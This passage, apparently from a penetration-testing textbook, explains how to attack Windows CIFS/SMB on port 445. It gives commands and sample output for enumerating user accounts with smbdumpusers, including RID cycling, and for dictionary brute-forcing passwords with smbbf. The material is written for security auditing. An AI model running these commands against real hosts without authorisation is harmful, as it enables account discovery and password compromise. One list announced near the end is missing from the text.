The Common Internet File System (CIFS) is found running on Windows 2000, XP, and 2003 hosts through both TCP and UDP port 445. CIFS is the native mode for SMB access within these operating systems, but NetBIOS access is provided for backward compatibility. Through CIFS, you can perform exactly the same tests as with the NetBIOS session service, including enumeration of user and system details, brute-force of user passwords, and system access upon authenticating (such as file access and execution of arbitrary commands). 9.6.1 CIFS EnumerationIn the same way that system and user information can be gathered through accessing SMB services through NetBIOS, CIFS can be directly queried to enumerate the same information: you just need the right tools for the job. The SMB Auditing Tool (SMB-AT) is a suite of useful utilities, available as Win32 executables and source code (for compilation on Linux and BSD platforms in particular) from http://www.cqure.net. 9.6.1.1 User enumeration through smbdumpusersThe smbdumpusers utility is a highly versatile Windows NT user enumeration tool that can query SMB through both NetBIOS session (TCP 139) and CIFS (TCP 445) services. A second useful feature is the way the utility can enumerate users through a direct dump that works with RestrictAnonymous=0, but also using the RID cycling technique that can evade RestrictAnonymous=1 settings by attempting to reverse each ID value to a username. Example 9-20 shows the usage and command-line options for smbdumpusers. Example 9-20. smbdumpusers usage and command-line optionsD:\smb-at> smbdumpusers SMB - DumpUsers V1.0.4 by (patrik.karlsson@ixsecurity.com) ------------------------------------------------------------------- usage: smbdumpusers -i <ipaddress|ipfile> [options] -i* IP or <filename> of server[s] to bruteforce -m Specify which mode 1 Dumpusers (Works with restrictanonymous=0) 2 SidToUser (Works with restrictanonymous=0|1) -f Filter output 0 Default (Filter Machine Accounts) 1 Show All -e Amount of sids to enumerate -E Amount of sid mismatches before aborting mode 2 -n Start at SID -s Name of the server to bruteforce -r Report to <ip>.txt -t timeout for connect (default 300ms) -v Be verbose -P Protocol version 0 - Netbios Mode 1 - Windows 2000 Native Mode Example 9-21 shows the smbdumpusers tool dumping user information via RID cycling (as with GetAcct in Figure 9-3) through CIFS. Example 9-21. Cycling RID values to find usernames with smbdumpusersD:\smb-at> smbdumpusers -i 192.168.189.1 -m 2 -P1 500-Administrator 501-Guest 513-None 1000-__vmware_ _ 1001-__vmware_user_ _ 1002-VUSR_OSG-SERV 1003-mickey 9.6.2 CIFS Brute ForceThe SMB-AT toolkit contains a utility called smbbf that can launch brute-force password-grinding attacks against both NetBIOS session and CIFS services. Example 9-22 shows the smbbf usage. Example 9-22. smbbf usage and command-line optionsD:\smb-at> smbbf SMB - Bruteforcer V1.0.4 by (patrik.karlsson@ixsecurity.com) -------------------------------------------------------------- usage: smbbf -i [options] -i* IP address of server to bruteforce -p Path to file containing passwords -u Path to file containing users -s Server to bruteforce -r Path to report file -t timeout for connect (default 300ms) -w Workgroup/Domain -g Be nice, automaticaly detect account lockouts -v Be verbose -P Protocol version 0 - Netbios Mode 1 - Windows 2000 Native Mode To run smbbf against the CIFS service at 192.168.189.1, using the user list from users.txt and the dictionary file common.txt, use the syntax shown in Example 9-23. Example 9-23. Using smbbf against the CIFS serviceD:\smb-at> smbbf -i 192.168.189.1 -p common.txt -u users.txt -v -P1 INFO: Could not determine server name ... -- Starting password analysis on 192.168.189.1 -- Logging in as Administrator with secret on WIDGETS Access denied Logging in as Administrator with qwerty on WIDGETS Access denied Logging in as Administrator with letmein on WIDGETS Access denied Logging in as Administrator with password on WIDGETS Access denied Logging in as Administrator with abc123 on WIDGETS Access denied The smbbf utility can clock around 1,200 login attempts per second when grinding Windows 2000 hosts across local area networks. Against NT 4.0 hosts, the tool is much slower, achieving only a handful of login attempts per second. If smbbf is run with only an IP address specified, it does the following:
The tool is extremely useful in this mode when performing a brief audit of a given Windows host, and can be left running unattended for extended periods of time. If multiple accounts are given to brute force, the tool will grind passwords for each account and move to the next. |